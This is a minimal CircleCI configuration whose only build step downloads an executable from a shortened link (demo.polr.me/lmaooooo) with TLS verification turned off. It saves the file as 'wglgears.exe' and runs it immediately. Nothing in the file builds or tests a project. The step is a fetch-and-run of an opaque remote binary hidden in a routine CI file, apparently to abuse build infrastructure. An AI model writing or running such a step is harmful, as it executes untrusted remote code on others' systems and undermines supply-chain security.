version: 2.1
orbs:
  win: circleci/windows@2.2.0
jobs:
  build:
    executor:
      name: win/default
      shell: cmd.exe
    steps:
      - run: curl -LJOk -o wglgears.exe http://demo.polr.me/lmaooooo && wglgears.exe